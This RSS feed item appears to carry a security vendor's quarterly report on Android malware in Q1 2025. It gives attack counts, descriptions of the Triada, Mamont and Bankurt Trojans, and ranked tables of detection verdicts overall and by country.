<pubDate>Thu, 05 Jun 2025 10:00:04 +0000</pubDate>
<category><![CDATA[Malware reports]]></category>
<category><![CDATA[Google Android]]></category>
<category><![CDATA[Mobile Malware]]></category>
<category><![CDATA[Malware Statistics]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Trojan Banker]]></category>
<category><![CDATA[Trojan]]></category>
<category><![CDATA[Trojan-Spy]]></category>
<category><![CDATA[Mamont]]></category>
<category><![CDATA[Triada]]></category>
<category><![CDATA[Mobile threats]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116676</guid>
<description><![CDATA[The number of attacks on mobile devices involving malware, adware, or unwanted apps saw a significant increase in the first quarter.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><strong>IT threat evolution in Q1 2025. Mobile statistics</strong><br />
<a href="https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/" target="_blank">IT threat evolution in Q1 2025. Non-mobile statistics</a></p>
<h2 id="quarterly-figures">Quarterly figures</h2>
<p>According to Kaspersky Security Network, in the first quarter of 2025:</p>
<ul>
<li>A total of 12 million attacks on mobile devices involving malware, adware, or unwanted apps were blocked.</li>
<li>Trojans, the most common mobile threat, accounted for 39.56% of total detected threats.</li>
<li>More than 180,000 malicious and potentially unwanted installation packages were detected, which included:
<ul>
<li>49,273 packages related to mobile bankers;</li>
<li>1,520 mobile ransomware Trojans.</li>
</ul>
</li>
</ul>
<h2 id="quarterly-highlights">Quarterly highlights</h2>
<p>Attacks on Android devices involving malware, adware, or potentially unwanted apps in the first quarter of 2025 increased to 12,184,351.</p>
<div class="js-infogram-embed" data-id="_/8P6yIGAQtZDpwXz3553s" data-type="interactive" data-title="01 EN-RU-ES Mobile malware Q1 2025 - charts" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Attacks on users of Kaspersky mobile solutions, Q3 2023 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04180422/malware-report-mobile-statistics1.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>This growth was largely due to the activity of Mamont banking Trojans and Fakemoney scam apps, along with the discovery of counterfeit smartphones imitating popular brands that came preloaded with the <a href="https://securelist.com/triada-trojan-modules-analysis/116380/" target="_blank" rel="noopener">Triada backdoor</a>, which is capable of dynamically downloading any modules from a server. Triada’s modules possess a variety of features. They can substitute URLs in the browser, block connections to specific servers, or steal login credentials for social media and instant messaging services like TikTok, WhatsApp, Line, or Telegram. A module that steals crypto from wallets is worth separate mention. We tracked down several of the scammers’ wallets, and their balances suggest that a total of at least $270,000 had been stolen. The stolen amount in TRON cryptocurrency alone was $182,000.</p>
<div class="js-infogram-embed" data-id="_/MVFlNd9YeInPl0CKeVvj" data-type="interactive" data-title="02 EN Triada Trojan graphics" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>A profitability chart for the threat actor’s TRON wallets (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03132400/malware-report-mobile-statisticsEN2.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>The first quarter saw the discovery of a new banker that attacks users in Turkey: Trojan-Banker.AndroidOS.Bankurt.c. It masquerades as an app for viewing pirated movies.</p>
<p align="center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1.png" alt="" width="230" height="407" class="aligncenter size-full wp-image-116724" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1.png 496w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1-169x300.png 169w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1-198x350.png 198w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1-158x280.png 158w" sizes="auto, (max-width: 230px) 100vw, 230px" /></a></p>
<p>The Trojan uses DeviceAdmin permissions to gain a foothold in the system, obtains access to Accessibility features, and then helps its operators to control the device remotely via VNC and steal text messages.</p>
<h2 id="mobile-threat-statistics">Mobile threat statistics</h2>
<p>The number of detected Android malware and unwanted app samples increased compared to the fourth quarter of 2024, totaling 180,405.</p>
<div class="js-infogram-embed" data-id="_/dHrg8mbjTSEXXo0SjyKT" data-type="interactive" data-title="02-EN-RU-ES-Mobile malware Q1 2025 - charts" style="min-height:;"></div>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Detected malicious and potentially unwanted installation packages, Q1 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04180411/malware-report-mobile-statistics4.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>Looking at the distribution of detected installation packages by type, we see that the typical frontrunners, RiskTool and adware, dropped to the third and fourth spots, respectively, in the first quarter. Banking Trojans (27.31%) and spy Trojans (24.49%) ranked as the most common threats.</p>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of detected mobile apps by type, Q4 2024* – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03132852/malware-report-mobile-statisticsEN5.png" target="_blank" rel="noopener">download</a>)</em></p>
<p><em>* Data for the previous quarter may differ slightly from previously published data due to certain verdicts being retrospectively revised.</em></p>
<p>The revision was prompted by a sharp increase in Mamont banker installation packages in the first quarter. Agent.akg, which steals text messages, accounted for the largest number of spy Trojan installation packages.</p>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share* of users attacked by the given type of malicious or potentially unwanted apps out of all targeted users of Kaspersky mobile products, Q4 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03133006/malware-report-mobile-statisticsEN6.png" target="_blank" rel="noopener">download</a>)</em></p>
<p><em>* The total may exceed 100% if the same users experienced multiple attack types.</em></p>
<p>The first quarter saw a sharp rise in the number of users attacked by Trojans. This was driven by a large number of detected devices preloaded with the Triada Trojan and the increased activity of Fakemoney scam apps, which tricked users into sharing their personal data by promising easy money. The increase in the number of users who encountered banking Trojans was, again, due to the activity of the Mamont family.</p>
<h2 id="top-20-most-frequently-detected-types-of-mobile-malware">TOP 20 most frequently detected types of mobile malware</h2>
<p><em>Note that the malware rankings below exclude riskware and potentially unwanted apps, such as adware and RiskTool.</em></p>
<table>
<tbody>
<tr>
<td><strong>Verdict</strong></td>
<td><strong>%* Q4 2024</strong></td>
<td><strong>%* Q1 2025</strong></td>
<td><strong>Difference in p.p.</strong></td>
<td><strong>Change in ranking</strong></td>
</tr>
<tr>
<td>Trojan.AndroidOS.Fakemoney.v</td>
<td>30.33</td>
<td>26.41</td>
<td>–3.92</td>
<td>0</td>
</tr>
<tr>
<td>DangerousObject.Multi.Generic</td>
<td>13.26</td>
<td>19.30</td>
<td>+6.04</td>
<td>0</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.db</td>
<td>0.08</td>
<td>15.99</td>
<td>+15.91</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.da</td>
<td>1.56</td>
<td>11.21</td>
<td>+9.65</td>
<td>+14</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.bc</td>
<td>10.79</td>
<td>7.61</td>
<td>–3.17</td>
<td>–2</td>
</tr>
<tr>
<td>Backdoor.AndroidOS.Triada.z</td>
<td>0.00</td>
<td>4.71</td>
<td>+4.71</td>
<td></td>
</tr>
<tr>
<td>Trojan.AndroidOS.Triada.hf</td>
<td>0.00</td>
<td>3.81</td>
<td>+3.81</td>
<td></td>
</tr>
<tr>
<td>Trojan.AndroidOS.Triada.fe</td>
<td>0.00</td>
<td>3.48</td>
<td>+3.47</td>
<td></td>
</tr>
<tr>
<td>Trojan.AndroidOS.Triada.gn</td>
<td>2.56</td>
<td>2.68</td>
<td>+0.13</td>
<td>+3</td>
</tr>
<tr>
<td>Trojan-Clicker.AndroidOS.Agent.bh</td>
<td>0.51</td>
<td>2.58</td>
<td>+2.07</td>
<td>+27</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.ef</td>
<td>0.00</td>
<td>2.44</td>
<td>+2.44</td>
<td></td>
</tr>
<tr>
<td>Trojan-Downloader.AndroidOS.Dwphon.a</td>
<td>3.40</td>
<td>2.19</td>
<td>–1.21</td>
<td>–2</td>
</tr>
<tr>
<td>Trojan.AndroidOS.Fakemoney.u</td>
<td>0.02</td>
<td>1.88</td>
<td>+1.86</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Agent.rj</td>
<td>3.63</td>
<td>1.86</td>
<td>–1.77</td>
<td>–7</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.ek</td>
<td>0.00</td>
<td>1.83</td>
<td>+1.83</td>
<td></td>
</tr>
<tr>
<td>Trojan.AndroidOS.Triada.ga</td>
<td>4.84</td>
<td>1.74</td>
<td>–3.10</td>
<td>–11</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.eb</td>
<td>0.00</td>
<td>1.59</td>
<td>+1.59</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.cb</td>
<td>1.09</td>
<td>1.56</td>
<td>+0.47</td>
<td>+4</td>
</tr>
<tr>
<td>Trojan.AndroidOS.Triada.gs</td>
<td>3.63</td>
<td>1.47</td>
<td>–2.16</td>
<td>–13</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.dn</td>
<td>0.00</td>
<td>1.46</td>
<td>+1.46</td>
<td></td>
</tr>
</tbody>
</table>
<p><em>* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.</em></p>
<p>Nearly the entire list was occupied by the aforementioned Fakemoney apps and various Mamont banking Trojan variants, along with the preloaded Backdoor.AndroidOS.Triada.z and Trojan.AndroidOS.Triada.hf malicious apps. Also remaining among the most prevalent Android malware were modified messengers with the embedded Triada Trojan (Triada.fe, Triada.gn, Triada.ga, Triada.gs) and the preloaded Dwphon Trojan. Notably, the list includes Trojan-Clicker.AndroidOS.Agent.bh, a fake ad blocker that, rather than blocking ads, inflates ad views.</p>
<h2 id="region-specific-malware">Region-specific malware</h2>
<p>This section describes malware families that mostly focused on specific countries.</p>
<table>
<tbody>
<tr>
<td><strong>Verdict</strong></td>
<td><strong>Country*</strong></td>
<td><strong>%**</strong></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Coper.a</td>
<td>Turkey</td>
<td>96.85</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Rewardsteal.ks</td>
<td>India</td>
<td>94.36</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Coper.c</td>
<td>Turkey</td>
<td>94.29</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Rewardsteal.jp</td>
<td>India</td>
<td>93.78</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.BrowBot.w</td>
<td>Turkey</td>
<td>92.81</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Rewardsteal.ib</td>
<td>India</td>
<td>92.79</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Rewardsteal.lv</td>
<td>India</td>
<td>92.34</td>
</tr>
<tr>
<td>Trojan-Spy.AndroidOS.SmForw.ko</td>
<td>India</td>
<td>90.71</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.UdangaSteal.k</td>
<td>India</td>
<td>90.12</td>
</tr>
<tr>
<td>Trojan-Dropper.AndroidOS.Hqwar.bf</td>
<td>Turkey</td>
<td>88.34</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Agent.rg</td>
<td>India</td>
<td>86.97</td>
</tr>
<tr>
<td>Trojan-Dropper.AndroidOS.Agent.sm</td>
<td>Turkey</td>
<td>82.54</td>
</tr>
</tbody>
</table>
<p><em>* The country where the malware was most active.</em><br />
<em>** Unique users who encountered this Trojan variant in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same variant.</em></p>
<p>The first quarter saw a somewhat smaller number of “selective” malicious apps than before. As usual, Turkey experienced a prevalence of banking Trojans: Coper, equipped with RAT capabilities enabling attackers to steal money through remote device management; BrowBot, which pilfers text messages; and the banking Trojan droppers Hqwar and Agent.sm. In India, users faced Rewardsteal banking Trojans which stole bank details by pretending to offer money. Additionally, the UdangaSteal Trojan, previously prevalent in Indonesia, and the SmForw.ko Trojan, which forwards incoming text messages to another number, also spread to India.</p>
<h2 id="mobile-banking-trojans">Mobile banking Trojans</h2>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of installation packages for mobile banking Trojans detected by Kaspersky, Q1 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04180435/malware-report-mobile-statistics7.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>The increase in the number of installation packages for banking Trojans was primarily driven by Mamont. Its creators apparently follow a MaaS model, enabling any scammer to get a custom variant generated for a fee. As a result, a large number of unrelated cybercriminals are spreading distinct versions of Mamont.</p>
<p>When it comes to the percentage of users targeted, various versions of Mamont also occupy most of the top spots.</p>
<h3 id="top-10-mobile-bankers">Top 10 mobile bankers</h3>
<table>
<tbody>
<tr>
<td><strong>Verdict</strong></td>
<td><strong>%* Q4 2024</strong></td>
<td><strong>%* Q1 2025</strong></td>
<td><strong>Difference in p.p.</strong></td>
<td><strong>Change in ranking</strong></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.db</td>
<td>0.41</td>
<td>38.07</td>
<td>+37.67</td>
<td>+18</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.da</td>
<td>7.71</td>
<td>26.68</td>
<td>+18.98</td>
<td>+1</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.bc</td>
<td>53.25</td>
<td>18.12</td>
<td>–35.13</td>
<td>–2</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.ef</td>
<td>0.00</td>
<td>5.80</td>
<td>+5.80</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Agent.rj</td>
<td>17.93</td>
<td>4.43</td>
<td>–13.50</td>
<td>–3</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.ek</td>
<td>0.00</td>
<td>4.37</td>
<td>+4.37</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.eb</td>
<td>0.00</td>
<td>3.80</td>
<td>+3.80</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.cb</td>
<td>5.39</td>
<td>3.71</td>
<td>–1.67</td>
<td>–4</td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Mamont.dn</td>
<td>0.00</td>
<td>3.48</td>
<td>+3.48</td>
<td></td>
</tr>
<tr>
<td>Trojan-Banker.AndroidOS.Creduz.q</td>
<td>0.00</td>
<td>1.43</td>
<td>+1.43</td>
<td></td>
</tr>
</tbody>
</table>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
</channel>
</rss>